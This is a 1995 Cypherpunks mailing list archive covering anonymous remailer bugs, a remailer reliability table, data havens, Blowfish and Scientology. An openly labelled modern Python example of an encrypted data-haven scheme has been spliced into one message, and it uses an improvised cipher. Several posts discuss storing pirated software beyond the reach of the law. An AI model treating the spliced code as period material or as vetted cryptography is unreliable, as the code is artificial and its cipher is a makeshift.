> and clear.  This is repulsive when you find out that Wing in particular
> has gone on to be implicated in more damage to the Internet (as Posse
> and ILF) than anyone in the history of computing.  This I find
> truly disgusting, and hope that the Secret Service are proud of
> themselves.
> 
> Imagine if I wrote a piece about the terrible treatment of a poor
> prisoner in Wisconsin who was bludgeoned to death by other inmates
> while guards looked away.  Imagine if I tried to explain the fact that
> poor Jeff Dahmer was provoked to murder and cannibalism by the mocking
> of adolescent boys who teased and called him a faggot.  How would you
> feel if I tried to convince you that we should look upon him with pity
> and think of him as a misunderstood political prisoner?  You would
> probably feel about how I do about Quittner's story.
> 
> 'Hacker' can just as easily be applied to "journalists" too, and with
> this piece Quittner has joined the Hack Journalist Hall of Fame,
> taking his place right next to Richard Sandza.
> 
> Quittner did get a few things right.  I do have a big cat named Spud,
> I do work at a computer company and I do sell fantastic t-shirts.  Buy
> some.
> 
> With Love,
> 
> Chris Goggans
> aka Erik Bloodaxe
> 
>  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> 
>                  http://fringeware.com/staff/jonl
>


-- 
_______________________________________________________________________________
Paul Ferguson                         
US Sprint                                          tel: 703.689.6828
Managed Network Engineering                   internet: paul@hawk.sprintmrn.com
Reston, Virginia  USA                             http://www.sprintmrn.com 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sun, 15 Jan 95 19:30:40 PST
To: cypherpunks@toad.com
Subject: Re: FAREWELL TO A.R.S. (fwd)
Message-ID: <pstemari.80.00736736@erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


Now the cypherpunks are going to get blamed for anything that happens to the 
"Church" of Scientology.  Sigh:

In article <3f86hh$6gj@ag.oro.net> smj@smudge.oro.net (Scott Jennings) writes:
> ... 
>Homer Wilson Smith (homer@math.cornell.edu) wrote:

>: ...  is a joke.  Their rmgroup message did exactly nothing except create
>: 10 more newgroup message and a total war zone on alt.config.  They are
>: not only pissing off the cypherpunks, but also pissing off the people
>: of alt.config.  If they continue, this war may spread from the internet
>: into the real world as cypherpunks start to hack Church accounts and
>: communication lines everywhere, causing total disruption of Scientology.
>:  
>:      If all the cypherpunks and hackers and crackers and phone freaks
>: and virus writers of the world unite and start to 'rmgroup Scientology', who 
>: do you think will win? ...


	Paul J. Ste. Marie,
	pstemari@well.sf.ca.us, pstemari@erinet.com


	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 15 Jan 95 22:36:00 PST
To: cypherpunks@toad.com
Subject: CP meeting lost&found
Message-ID: <v01510100ab3fc06255b6@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Did anyone notice a left over coat at the CP meeting? My friend seems to be
unable to locate his. It's a purple Timberland with white leather trims.
The coat has very important mail in the inside pocket.

Thanks,


-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jml@wizard.synapse.net
Date: Sun, 15 Jan 95 20:50:35 PST
To: Homer Wilson Smith <homer@math.cornell.edu>
Subject: Re: bug in remailers
Message-ID: <199501160449.XAA15798@sentinel.synapse.net>
MIME-Version: 1.0
Content-Type: text/plain


>     If the remailers are working correctly, then one way you can be
>getting garbled postings is if your files are being garbled while you are
>pgping them.  Have you tried to pgp your files TO YOURSELF, and then unpgp
>them to see if they come out ok? 

Yes I have tried that. No problem they come out ok.

>     Does the bug happen on the remailers when things are not pgp'd?

Well no problem with anon@penet.fi. I'll try other remailers that permit 
unpgp'ed messages and get back to you.
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Sun, 15 Jan 95 21:04:09 PST
To: Ian Farquhar <ianf@sydney.sgi.com>
Subject: Re: Crypto functions
In-Reply-To: <9501161145.ZM27648@wiley.sydney.sgi.com>
Message-ID: <Pine.SV4.3.91.950115235145.23581A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> Well, I wasn't the original person who said that they wouldn't use it,
> but I would agree.  It's too new.  It looks very good so far, but until it's
> been through a lot more analysis than Blowfish has received so far, it is
> too much of an unknown quantity.

   Ah.  Incidentally, I wasn't just being a wiseass when I asked why, I 
wanted to know.  

   Has no one significantly cryptanalysed Blowfish yet?

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Sun, 15 Jan 95 20:54:25 PST
To: jml@wizard.synapse.net
Subject: Re: bug in remailers
In-Reply-To: <199501160449.XAA15798@sentinel.synapse.net>
Message-ID: <Pine.SUN.3.91.950115235403.24201A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



    I am getting the same errors, even without pgp!
 
    homer


On Sun, 15 Jan 1995 jml@wizard.synapse.net wrote:

> >     If the remailers are working correctly, then one way you can be
> >getting garbled postings is if your files are being garbled while you are
> >pgping them.  Have you tried to pgp your files TO YOURSELF, and then unpgp
> >them to see if they come out ok? 
> 
> Yes I have tried that. No problem they come out ok.
> 
> >     Does the bug happen on the remailers when things are not pgp'd?
> 
> Well no problem with anon@penet.fi. I'll try other remailers that permit 
> unpgp'ed messages and get back to you.
>  
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jml@wizard.synapse.net
Date: Sun, 15 Jan 95 21:00:04 PST
To: Homer Wilson Smith <homer@math.cornell.edu>
Subject: Re: bug in remailers
Message-ID: <199501160459.XAA15941@sentinel.synapse.net>
MIME-Version: 1.0
Content-Type: text/plain


>    I am getting the same errors, even without pgp!
> 
>    homer

Well to tell the truth I'm glad that I'm not the only one it's happening to. 
This seems a fairly serious problem. (To anonymous remailers sysadmin) Is 
this something new? Must be I guess. (Paranoid mode on). Sabotage?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Sun, 15 Jan 95 21:03:12 PST
To: jml@wizard.synapse.net
Subject: Re: bug in remailers
In-Reply-To: <199501160459.XAA15941@sentinel.synapse.net>
Message-ID: <Pine.SUN.3.91.950116000253.24413A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     Am looking to find out why...


On Sun, 15 Jan 1995 jml@wizard.synapse.net wrote:

> >    I am getting the same errors, even without pgp!
> > 
> >    homer
> 
> Well to tell the truth I'm glad that I'm not the only one it's happening to. 
> This seems a fairly serious problem. (To anonymous remailers sysadmin) Is 
> this something new? Must be I guess. (Paranoid mode on). Sabotage?
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jml@wizard.synapse.net
Date: Sun, 15 Jan 95 21:12:49 PST
To: cypherpunks@toad.com
Subject: Re: Interesting problem with remailers
Message-ID: <199501160512.AAA16114@sentinel.synapse.net>
MIME-Version: 1.0
Content-Type: text/plain


>To: lce@wwa.com (Larry E)
>From: jml@wizard.synapse.net
>Subject: Re: Interesting problem with remailers

>>Try pgp -eat instead of pgp -ea.  Please let me know if that solves
>>your problem; I'm curious.

No doesn't make any difference. Seems I'm not the only one to have this problem.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Date: Sun, 15 Jan 95 21:19:41 PST
To: Remailer-Operators@c2.org
Subject: Re: interesting problem with remailers (answer to FAQ)
In-Reply-To: <Pine.SUN.3.91.950115232616.23706A-100000@math>
Message-ID: <Yj6U5s200bkIM6yUwn@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I have encrypted this message with the public key of homer@rahul.net
> using the pgp -ea command (for armour).

Use -t




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Sun, 15 Jan 95 21:24:33 PST
To: jml@wizard.synapse.net
Subject: Re: bug in remailers
In-Reply-To: <199501160459.XAA15941@sentinel.synapse.net>
Message-ID: <Pine.SUN.3.91.950116002314.24783A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     Bug dead.
 
     It was unique to my remailer and was not a problem to other remailers.
 
     Christ, you just shouldn't let me near a keyboard.

     Rahul is out of reach for the moment, but I will fix it at first
chance.
 
     Homer
 
On Sun, 15 Jan 1995 jml@wizard.synapse.net wrote:

> >    I am getting the same errors, even without pgp!
> > 
> >    homer
> 
> Well to tell the truth I'm glad that I'm not the only one it's happening to. 
> This seems a fairly serious problem. (To anonymous remailers sysadmin) Is 
> this something new? Must be I guess. (Paranoid mode on). Sabotage?
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Mon, 16 Jan 95 00:32:14 PST
To: shamrock@netcom.com>
Subject: RE: CP meeting lost&found
Message-ID: <Chameleon.4.01.950116003148.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


>Did anyone notice a left over coat at the CP meeting? My friend seems to be
>unable to locate his. It's a purple Timberland with white leather trims.
>The coat has very important mail in the inside pocket.

Yes.  As we were leaving, Katy was asking around for the owner of the jacket.
I assume she probably still has it or it is at SGI for safekeeping.

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Sun, 15 Jan 95 21:39:50 PST
To: jml@wizard.synapse.net
Subject: Re: bug in remailers
In-Reply-To: <199501160459.XAA15941@sentinel.synapse.net>
Message-ID: <Pine.SUN.3.91.950116003926.25022C-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



    OK, it's fixed.  Sorry.  Homer


On Sun, 15 Jan 1995 jml@wizard.synapse.net wrote:

> >    I am getting the same errors, even without pgp!
> > 
> >    homer
> 
> Well to tell the truth I'm glad that I'm not the only one it's happening to. 
> This seems a fairly serious problem. (To anonymous remailers sysadmin) Is 
> this something new? Must be I guess. (Paranoid mode on). Sabotage?
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Date: Sun, 15 Jan 95 22:42:17 PST
To: Ben.Goren@asu.edu
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <v02110101ab3f4b2da617@[129.219.97.131]>
Message-ID: <9501160642.AA07182@toad.com>
MIME-Version: 1.0
Content-Type: text


A couple of days ago I wrote:

> >[. . .]
> >How does one keep a site from becoming a remote pirated-software exchange
> >site? [. . . .]
> 
> Simple. The file is deleted upon retrieval.
> 

Assuming that data haven does. I imagine some wouldn't, to allow for long-
term storage or retrieval by multiple parties (which, for data havens to be
viable as a commodity would probably be supported in some way as a feature)


> --
> Ben.Goren@asu.edu, Arizona State University School of Music
>  Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.

	Rob

Rob Rothenburg Walking-Owl, SUNY @ Stony Brook <rrothenb@ic.sunysb.edu>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Date: Sun, 15 Jan 95 22:50:06 PST
To: asgaard@sos.sll.se (Mats Bergstrom)
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Pine.HPP.3.91.950115145754.101B-100000@cor.sos.sll.se>
Message-ID: <9501160649.AA07279@toad.com>
MIME-Version: 1.0
Content-Type: text


A couple of days ago I wrote:

> > such a service could become a magnet for the "elite warez" crowd...
> 
> 
> What's wrong with young, curious eLiTiStS running storing sites for
> mutual benefits ('warez')? Some say copyright is dead. Others have
> taken this to their hearts, especially for private use, and I don't
> blame them. Copyrighted data on a server in a jurisdiction that
> doesn't acknowledge the copyrights - a prime use for Data Havens
> when they come of age.

I'm not saying anything is wrong with it.... just that it is a problem
that can lead the "authorities" to try to shut down the site, esp. when
the pornography bogieman wears out (pun intended ;).  Strangely, even
though it's more socially acceptable for people to use "borrowed" wares
there's poorer arguments for defending it than "pornography"... hardly
any cries of foul happen when a board or site is busted for pirated
software than pornography.

Basically, what I'm saying is that it's an issue that data haven admins
should keep in mind (esp. if there's a fee): perhaps they can most safely
be run in jurisdictions with lax or no copyright laws.

> 
> Mats
> 
Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Sun, 15 Jan 95 23:04:34 PST
To: Cypherpeople <cypherpunks@toad.com>
Subject: Cryptanalysis of Blowfish (Was: Re: Crypto functions)
In-Reply-To: <Pine.SV4.3.91.950115235145.23581A-100000@xcalibur>
Message-ID: <Pine.SUN.3.91.950116020138.20362A-100000@unix1.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Jan 1995, Jonathan Cooper wrote:

>    Has no one significantly cryptanalysed Blowfish yet?

	Bruce Schneier is running a contest. First person to come up with 
a significant attack against full Blowfish (no partial round variants) 
gets $1000. The contest ends in April. Last time I heard, he had gotten a 
very interesting attack from someone, but not a complete one. He plans to 
reveal the results after the contest ends in April.

-mbh-
--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Sun, 15 Jan 95 23:38:23 PST
To: perry@imsi.com
Subject: Re: Jude Milhon in WIRED
Message-ID: <9501160735.AA22438@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Oh, come on, Perry - your memory must be decaying.
I've met Jude 3-4 times in the last 1.5 years, including at
Bay Area cypherpunks meetings (the long boring photo-shoot for
the NY Times Magazine, for instance), and it's been referred to
in the past that "cypherpunks" was her pun.  She's also the one
who put out requests for character contributions to a novel
she's doing, which went to the list.  Besides, if you're grumpy that
you haven't met someone, you need to get out here to the left coast
more often - New York winters must be getting to you :-)

			Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Mon, 16 Jan 95 00:59:40 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <9501160856.AA23138@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Ben writes:
> Paul, I think we're after two different objectives here.
> You want Alice to  be sure that Dave can't read her file;
> I want Dave to be sure that he can't read Alice's files.

Yeah.  Picking threat models is important.
Alice's job is easy; she can just encrypt stuff.
The problems are a bit different if the file can only be retrieved
by Alice, or if she can give retrieval tokens to Bob, Carol,
and alt.sex.spam.

If Dave is running a free or cheap service, he also may
need to prevent his site from becoming load-spammed by the
permanent floating warez+porno crowd.  (As Eric pointed out,
it's a policy-vs-mechanism issue; it's easier to run a service
if you've got mechanisms to support any policy you want.)

If Dave's charging for service, charging separately for
storage and retrieval can help - that lets the one-storage,
many-retrieval model work without having to use mechanisms like
automatic deletion-after-reading, which may not be useful for
some applications.  

For Dave to be sure he can't read Alice's files, he can't 
depend on Alice encrypting them - aside from entropy models
which are generally not very useful, Alice could always
encrypt the data and then publish the key.  So he has to do it.
Here're 1.5 approaches that can work for some threats:

Alice wants to store message M, using a key K known to Alice.
(K could be hash H(M) if desired, or sent to Dave along with M.)
Dave calculates H(K), encrypts M with K, stores E(M;K) under name H(K),
and then discards K.  To retrieve files, Alice sends either K or H(K).
There's some risk at storage - Dave is receiving the file,
so he's vulnerable to cops between the time he PGP-decrypts the 
message and the time he re-encrypts and destroys the key,
but it's brief, and can be automated so he doesn't see it in person;
he could still be coerced into eavesdropping future storage
unless there's a good blinded variant on the method.

Alice needs to keep K or give it to her friends.
If retrievals use K, Dave can decrypt on transmission (some risk,
some potential revenue).  This has the advantage that Dave doesn't
know the access token to retrieve a given file across the net,
so he can't tell the cops what to scan for.

If retrievals only use H(K), he can't decrypt on retrieval, 
so even if the cops coerce Alice or bribe Bob into retrieving it,
Dave doesn't see the content again; it's probably a lot safer for Dave.
The risk is that cops who break Dave's system or coerce him into
giving them the files will know to look for H(K) on other systems;
scanning the net for anything that might hash to H(K) is much harder.
Also, Alice might want to give Bob and Carol H(K) to retrieve the files,
but not give them K to decrypt until later, or might send K
through other channels that only the In Crowd get.

Another extension is for Dave to store the file as H(H(K)), 
to make it more work to match access tokens against files -
Dave has the advantage of not even knowing the access token
(which the retrieve-with-K method has) as well as not letting Dave decrypt.

Using user-selected keys instead of message hashes is obviously a 
lot faster, since Dave doesn't have to calculate them,
and makes it a bit easier for Alice to memorize the keys 
instead of storing them, but it requires more Syntax in the requests,
and increases the chances of wimpy keys and especially collisions
(which essentially never happen in hash-based systems, but are more
common if people want to use keys like "Secret Plans".)
And Alice can always store the hashes encrypted and stegoed,
or store an index file on the datahaven and give her friends
the access tokens for that instead of her whole collection.
Hashes are also safer for Dave if Alice is compromised or spam is a problem,
since he doesn't have to respond to requests for "spam1.gif" or
"Nuclear Narcoterrorist KiddyPorn Monthly" or "Windows_for_95.c",
which is riskier than requests for 0x402930be89a9c901.

			Bill
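The storage scheme described in the message above, as an added example that is not part of the original post: Dave stores E(M;K) under H(K) or H(H(K)) and keeps no copy of K, and the two retrieval modes are shown side by side. Assumptions: SHA-256 stands in for H, an HMAC-SHA-256 counter-mode keystream with a MAC stands in for the cipher E, and the `DataHaven` class and its method names are hypothetical.

```python
"""Added illustration (not from the original post) of the data haven scheme:
Dave stores E(M;K) under the name H(K) or H(H(K)) and then discards K."""
import hashlib
import hmac
import os


def H(data: bytes) -> bytes:
    """Assumption: SHA-256 plays the role of the post's hash H."""
    return hashlib.sha256(data).digest()


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    # Stand-in cipher: HMAC-SHA-256 in counter mode. A deployment would use a
    # vetted AEAD; this keeps the example inside the standard library.
    out = bytearray()
    counter = 0
    while len(out) < length:
        block = nonce + counter.to_bytes(8, "big")
        out += hmac.new(key, block, hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def E(message: bytes, key: bytes) -> bytes:
    """E(M;K): returns nonce || ciphertext || tag."""
    nonce = os.urandom(16)
    enc_key, mac_key = H(b"enc" + key), H(b"mac" + key)
    stream = _keystream(enc_key, nonce, len(message))
    body = bytes(m ^ s for m, s in zip(message, stream))
    tag = hmac.new(mac_key, nonce + body, hashlib.sha256).digest()
    return nonce + body + tag


def D(blob: bytes, key: bytes) -> bytes:
    """Inverse of E; raises ValueError on a wrong key or a modified blob."""
    if len(blob) < 48:
        raise ValueError("blob too short")
    nonce, body, tag = blob[:16], blob[16:-32], blob[-32:]
    enc_key, mac_key = H(b"enc" + key), H(b"mac" + key)
    expected = hmac.new(mac_key, nonce + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("wrong key or corrupted blob")
    stream = _keystream(enc_key, nonce, len(body))
    return bytes(c ^ s for c, s in zip(body, stream))


class DataHaven:
    """Dave's side. double_hash=True is the H(H(K)) extension from the post."""

    def __init__(self, double_hash: bool = False):
        self.double_hash = double_hash
        self._files = {}  # storage name -> E(M;K); K is never kept

    def _name_from_key(self, key: bytes) -> bytes:
        return H(H(key)) if self.double_hash else H(key)

    def store(self, message: bytes, key: bytes) -> None:
        name = self._name_from_key(key)
        if name in self._files:
            # The collision case the post warns about for user-chosen keys.
            raise KeyError("a file is already stored under this key")
        self._files[name] = E(message, key)
        # K is dropped when this call returns. Python cannot guarantee the
        # bytes are wiped from memory; that is the brief exposure window
        # the post describes at storage time.

    def retrieve_with_key(self, key: bytes) -> bytes:
        """Retrieval by K: Dave decrypts on transmission and sees M again."""
        return D(self._files[self._name_from_key(key)], key)

    def retrieve_with_token(self, token: bytes) -> bytes:
        """Retrieval by H(K): Dave returns ciphertext and cannot decrypt it."""
        name = H(token) if self.double_hash else token
        return self._files[name]

    def seized_state(self) -> dict:
        """Everything an examiner of Dave's disk would find."""
        return dict(self._files)


if __name__ == "__main__":
    K = os.urandom(32)                      # Alice's key
    M = b"constructed sample file"          # constructed sample input
    haven = DataHaven(double_hash=True)
    haven.store(M, K)
    blob = haven.retrieve_with_token(H(K))  # Bob holds H(K), not yet K
    print("Dave holds the access token:", H(K) in haven.seized_state())
    print("Bob decrypts once given K:  ", D(blob, K) == M)
```

In the double-hash mode the seized state contains neither K nor the access token H(K), only H(H(K)) and the ciphertext.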




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 16 Jan 95 03:24:02 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <199501160356.TAA09359@netcom2.netcom.com>
Message-ID: <9501161122.AA05896@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May says:
> I'm not sure what Perry's not having heard of Jude Milhon is supposed
> to mean, or how "Wired" interviewing her is "another example of the
> continuing decay," etc.
> 
> In any case, Jude Milhon has been active in the hacker-writer
> community, going back to the 1970s.

Sorry. Everyone seems to be assuring me that I should know her and
that she's a longtime friend of Eric's, but I must admit that I've
no memory of anything she's done. I believe people who say she's the
origin of the term "cypherpunk", but I must admit to still having no
real knowledge of who this person is.

In any case, I apologize for my ignorance and will try to be on less of a
hair trigger in the future. However, following a long stream of Wired
interviews of bizarrely marginal community members, I simply assumed
this was Yet Another.

> Anyone who professes to be "disappointed" by "Wired" was clearly taken
> in by their hype.

I'm disappointed by them because they once used to care about getting
facts in articles right and about discussing meaningful issues, and
now they don't. They used to be a cross between the Economist and
Mondo 2000, and now they are just Mondo 2001. When you try to count
inaccuracies on the average page, you run out of interest in
continuing the exercise before you run out of errors. They also used
to have a point of view. They also used to have substantive articles,
and now they have cover stories on "Zippies!"

I'm not renewing my subscription.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 16 Jan 95 06:49:49 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199501161450.GAA11071@kiwi.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.bsu.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp hash";
$remailer{"soda"} = "<remailer@csua.berkeley.edu> eric post";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"desert"} = "<remail@desert.xs4all.nl> cpunk pgp. post";
$remailer{"nately"} = "<remailer@nately.ucsd.edu> cpunk pgp hash latent cut";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = "<homer@rahul.net> cpunk";
$remailer{"mix"} = "<mixmaster@nately.ucsd.edu> cpunk hash latent cut ek";
$remailer{"q"} = "<q@c2.org> cpunk hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.

Last ping: Mon 16 Jan 95 6:00:02 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
rahul    homer@rahul.net                  ***********#     3:32  99.99%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***+#*****+#     8:27  99.86%
ideath   remailer@ideath.goldenbear.com   ---------+--  2:11:08  99.84%
penet    anon@anon.penet.fi               ************    35:48  99.99%
nately   remailer@nately.ucsd.edu         +++ -+-+++++  1:08:44  99.76%
mix      mixmaster@nately.ucsd.edu        -++ .++++++*  1:43:39  99.75%
q        q@c2.org                         ++---+++++-   1:16:03  99.74%
vox      remail@vox.xs4all.nl             --------- -   9:46:45  99.99%
soda     remailer@csua.berkeley.edu       .... ..-..-   8:32:46  99.41%
alumni   hal@alumni.caltech.edu           +**** -++-*#  1:52:49  99.20%
portal   hfinney@shell.portal.com         #*#** -##- *  1:23:04  99.17%
extropia remail@extropia.wimsey.com       ++++++++++++  3:15:35  97.19%
rebma    remailer@rebma.mn.org            _-_.---_..-* 21:48:17  90.00%
desert   remail@desert.xs4all.nl          ----.-_.--   22:09:02  86.57%
usura    usura@replay.com                 -+**+ +-  ++    33:32  84.49%
xs4all   remailer@xs4all.nl               -+**+++-  **    22:59  79.87%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   Options and features

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.

   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.

   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.

   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.

   oldpgp
          Remailer does not like messages encoded with MIT PGP 2.6. Other
          versions of PGP, including 2.3a and 2.6ui, work fine.

   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.

   ksub
          Remailer always kills subject header, even in non-pgp mode.

   nsub
          Remailer always preserves subject header, even in pgp mode.

   latent
          Supports Matt Ghio's Latent-Time: option.

   cut
          Supports Matt Ghio's Cutmarks: option.

   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   special
          Accepts only pgp encrypted messages.

   ek
          Encrypt responses in reply blocks using Encrypt-Key:
          header.


   Comments and suggestions welcome!

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.Denver.Colorado.EDU (Alan Westrope)
Date: Mon, 16 Jan 95 09:15:48 PST
To: cypherpunks@toad.com
Subject: Re: Scientology [!]
In-Reply-To: <9501161616.AA06028@elysion.iaks.ira.uka.de>
Message-ID: <SKg6laa0iQiG077yn@ouray.denver.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 16 Jan, danisch@ira.uka.de (Hadmut Danisch) wrote:

> > FROM:  Lance Cottrell
> >        Operator of remailer@nately and mixmaster@nately
     [...--aw]
> >  I am willing to comply with your request.

> Oh. If this is true (is it?) and other remailer operators do the
> same, there will be no anonymous criticism of the Thetans any more.

I don't have the text of Lance's response available at the moment, but
I believe he clearly stated that he would not block remailings to the
mail-to-news gateways.  I.e., while he's complying with the letter of the
Co$ request, his remailers can still be used effectively for anonymous
posting.  Other than a slight delay in posting, I can't think of any
inconvenience this imposes on those wishing to post anonymously.

I thought it was an excellent response.  /* nudge, wink, etc. :-) */


Alan Westrope                  <awestrop@nyx.cs.du.edu>
__________/|-,                 <adwestro@ouray.denver.colorado.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxqooVRRFMq4NZY5AQGZzQP9HMVer1sD3dTnY/VUYz3CVTeCR+5ICfcR
kG60dHeP7s/qKBHTF1qTx1hUGExqnC6DOBnvkh6wjhohcfjyGrQiQtyyhRQX55NH
FUtR3gjJH0lLxB4Qr1RI3mempuXL4H5G/aQoqz1rxHN2lGUFx3YBD+2zmAqPqFIZ
KMgL0vx6kTc=
=j7er
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 16 Jan 95 10:27:25 PST
To: perry@imsi.com
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <9501161122.AA05896@snark.imsi.com>
Message-ID: <199501161819.KAA14478@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:

> Sorry. Everyone seems to be assuring me that I should know her and
> that she's a longtime friend of Eric's, but I must admit that I've
> no memory of anything she's done. I believe people who say she's the
> origin of the term "cypherpunk", but I must admit to still having no
> real knowledge of who this person is.
> 
